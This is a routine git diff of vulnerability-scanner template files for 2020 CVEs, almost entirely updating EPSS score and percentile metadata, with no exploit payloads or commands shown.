diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index ff8e4fdbf9..b4d7ba3c3b 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-10973 cwe-id: CWE-306 epss-score: 0.04225 - epss-percentile: 0.91261 + epss-percentile: 0.91266 cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index b84c32cbf6..6bf052871f 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-11034 cwe-id: CWE-601,CWE-185 epss-score: 0.00381 - epss-percentile: 0.69994 + epss-percentile: 0.70022 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index b8d575e32b..abb93b51bc 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-11110 cwe-id: CWE-79 epss-score: 0.00179 - epss-percentile: 0.54936 + epss-percentile: 0.54962 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 7dead8cd98..2ba4e3e617 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-11450 epss-score: 0.45897 - epss-percentile: 0.97016 + epss-percentile: 0.97018 cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index 27435024d6..60d86d5ae8 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-11455 cwe-id: CWE-22 epss-score: 0.71443 - epss-percentile: 0.97707 + epss-percentile: 0.97708 cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index fcf03b1643..0355c6e1c6 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-11529 cwe-id: CWE-601 epss-score: 0.00349 - epss-percentile: 0.68711 + epss-percentile: 0.68738 cpe: cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index fde08def62..11ca14fdf8 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11530 cwe-id: CWE-89 epss-score: 0.64439 - epss-percentile: 0.97513 + epss-percentile: 0.97515 cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index d5297a6e2d..bdc2faf218 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-11547 cwe-id: CWE-306 epss-score: 0.0011 - epss-percentile: 0.43827 + epss-percentile: 0.43851 cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index a6dd3960cb..97f1d68e4d 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11710 epss-score: 0.02084 - epss-percentile: 0.87866 + epss-percentile: 0.87872 cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 127d6559de..3fdcf0b967 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11798 cwe-id: CWE-22 epss-score: 0.8339 - epss-percentile: 0.98086 + epss-percentile: 0.98088 cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index d325076607..5c6ff96e0e 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11853 epss-score: 0.95173 - epss-percentile: 0.991 + epss-percentile: 0.99101 cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 612c166532..d1e3f0fc47 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11854 cwe-id: CWE-798 epss-score: 0.97414 - epss-percentile: 0.99905 + epss-percentile: 0.99906 cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index ba0cb33224..154c51106c 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11930 cwe-id: CWE-79 epss-score: 0.00396 - epss-percentile: 0.70594 + epss-percentile: 0.70618 cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 52108a65ab..77c55f856e 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-11991 cwe-id: CWE-611 epss-score: 0.80133 - epss-percentile: 0.97956 + epss-percentile: 0.97958 cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 803069c914..113f24e9fe 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-12054 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47395 + epss-percentile: 0.47406 cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 7507cff514..152d1d31f8 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-12127 cwe-id: CWE-306 epss-score: 0.03579 - epss-percentile: 0.90572 + epss-percentile: 0.90579 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index 1d355afda9..114c234b82 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-12256 cwe-id: CWE-79 epss-score: 0.17512 - epss-percentile: 0.9554 + epss-percentile: 0.95542 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 2bea713f8d..1fd50e4f0c 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-12447 cwe-id: CWE-22 epss-score: 0.01778 - epss-percentile: 0.86665 + epss-percentile: 0.86668 cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index a9c28ef073..88a4e1acf3 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-12478 cwe-id: CWE-306 epss-score: 0.01186 - epss-percentile: 0.83557 + epss-percentile: 0.83566 cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 61a8570fec..3dc061d37a 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-12720 cwe-id: CWE-306 epss-score: 0.8945 - epss-percentile: 0.98413 + epss-percentile: 0.98415 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index e497b7f127..063a4ed876 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-13117 cwe-id: CWE-77 epss-score: 0.08191 - epss-percentile: 0.93637 + epss-percentile: 0.93642 cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index ce7e4c174a..ad83e0e5f8 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-13121 cwe-id: CWE-601 epss-score: 0.00235 - epss-percentile: 0.61518 + epss-percentile: 0.61546 cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index 5e323d1150..d428a7fc22 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-13158 cwe-id: CWE-22 epss-score: 0.01822 - epss-percentile: 0.8688 + epss-percentile: 0.86882 cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 95e1f6186f..9ea51cbe6a 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-13258 cwe-id: CWE-79 epss-score: 0.00464 - epss-percentile: 0.72708 + epss-percentile: 0.72734 cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index f6db40b65f..c92ab04977 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13379 cwe-id: CWE-918 epss-score: 0.25457 - epss-percentile: 0.96147 + epss-percentile: 0.9615 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 65a6c64091..675dc1c941 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-13405 cwe-id: CWE-306 epss-score: 0.00673 - epss-percentile: 0.77573 + epss-percentile: 0.77593 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 03aaac9cef..a91b8f071c 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44579 + epss-percentile: 0.44601 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 701cd6d996..99345c852c 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13638 cwe-id: CWE-269 - epss-score: 0.28154 - epss-percentile: 0.96305 + epss-score: 0.324 + epss-percentile: 0.96518 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index dc8b18ca05..bf803d114b 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13700 cwe-id: CWE-639 epss-score: 0.01923 - epss-percentile: 0.87305 + epss-percentile: 0.87311 cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index dc883618f3..652a91d70f 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-13820 cwe-id: CWE-79 epss-score: 0.00237 - epss-percentile: 0.61619 + epss-percentile: 0.61647 cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index cff07d880b..0e2a0175b2 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-13851 cwe-id: CWE-78 epss-score: 0.96694 - epss-percentile: 0.99523 + epss-percentile: 0.99524 cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 954dd96377..9e26441638 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-13937 cwe-id: CWE-922 epss-score: 0.97368 - epss-percentile: 0.99869 + epss-percentile: 0.9987 cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 000493def8..7c59286b6d 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -79,4 +79,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ab3b475b8de66d789f11ca3e5ec68071ca4a15178efc71ffcfb105192b2d846022100f9255bfa82ff92c1028a1d3aa5a7c72a8704636f0c2e32a6b9106f0eba1ce499:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204ab3b475b8de66d789f11ca3e5ec68071ca4a15178efc71ffcfb105192b2d846022100f9255bfa82ff92c1028a1d3aa5a7c72a8704636f0c2e32a6b9106f0eba1ce499:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 96a8c5737d..46139499d7 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-13945 cwe-id: CWE-522 epss-score: 0.00558 - epss-percentile: 0.75099 + epss-percentile: 0.75121 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 25383563b6..e0fa0a9f15 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-14092 cwe-id: CWE-89 epss-score: 0.8059 - epss-percentile: 0.97968 + epss-percentile: 0.9797 cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 3542c9a4e6..c1fc73f632 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-14144 cwe-id: CWE-78 epss-score: 0.97121 - epss-percentile: 0.99711 + epss-percentile: 0.99712 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index d36e249229..26bf9dc354 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14179 epss-score: 0.0071 - epss-percentile: 0.78293 + epss-percentile: 0.78307 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 317a136815..272b5ac43a 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-14181 cwe-id: CWE-200 epss-score: 0.96763 - epss-percentile: 0.99552 + epss-percentile: 0.99553 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index dcdf264ed8..81e96cbd94 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44579 + epss-percentile: 0.44601 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index dd9b0596c9..9177e2388f 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-14413 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.39858 + epss-percentile: 0.39875 cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index e2d39d46b9..a82b5ac838 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-14864 cwe-id: CWE-22 epss-score: 0.30484 - epss-percentile: 0.96439 + epss-percentile: 0.96441 cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 393d19a6bb..9b172d7d8e 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-15050 cwe-id: CWE-22 epss-score: 0.282 - epss-percentile: 0.96308 + epss-percentile: 0.96311 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index a8451172f8..cacf876804 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-15129 cwe-id: CWE-601 epss-score: 0.00701 - epss-percentile: 0.78115 + epss-percentile: 0.78128 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 3ddc34b2f8..627682dee8 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-15148 cwe-id: CWE-502 epss-score: 0.01898 - epss-percentile: 0.8721 + epss-percentile: 0.87215 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 60afe4c2e6..c945a6a94e 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-15500 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58747 + epss-percentile: 0.58777 cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 39add25166..5ff25bc21a 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2020-15505 cwe-id: CWE-706 epss-score: 0.97504 - epss-percentile: 0.99976 + epss-percentile: 0.99975 cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index c99bcdb1ac..56e178d12a 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.2 cve-id: CVE-2020-15867 epss-score: 0.96701 - epss-percentile: 0.99525 + epss-percentile: 0.99526 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 111b86b1da..00d0944f74 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.55828 + epss-percentile: 0.55855 cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index f3682436fc..d3dba339bf 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-16139 epss-score: 0.01921 - epss-percentile: 0.87297 + epss-percentile: 0.87302 cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index f8e6d51e23..9d4baa2cd6 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-16952 cwe-id: CWE-346 epss-score: 0.4236 - epss-percentile: 0.96917 + epss-percentile: 0.9692 cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 7deb880f92..79a495a90c 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-17362 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41278 + epss-percentile: 0.41303 cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 1013221309..54b5980435 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-17453 cwe-id: CWE-79 epss-score: 0.01736 - epss-percentile: 0.86499 + epss-percentile: 0.86503 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 8eef68af9b..0201ba5dca 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-17456 cwe-id: CWE-78 epss-score: 0.97074 - epss-percentile: 0.99687 + epss-percentile: 0.99688 cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 553b60422b..71921fb88a 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-17463 cwe-id: CWE-89 epss-score: 0.89553 - epss-percentile: 0.98419 + epss-percentile: 0.98421 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 5eed3139d9..22222626be 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-17505 cwe-id: CWE-78 epss-score: 0.96839 - epss-percentile: 0.99581 + epss-percentile: 0.99582 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index f73dd34e38..183291fd9e 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-17506 cwe-id: CWE-89 epss-score: 0.95885 - epss-percentile: 0.99267 + epss-percentile: 0.99268 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index bc71a295a0..85b1899de1 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2020-17518 - cwe-id: CWE-22,CWE-23 + cwe-id: CWE-23,CWE-22 epss-score: 0.97459 epss-percentile: 0.99948 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 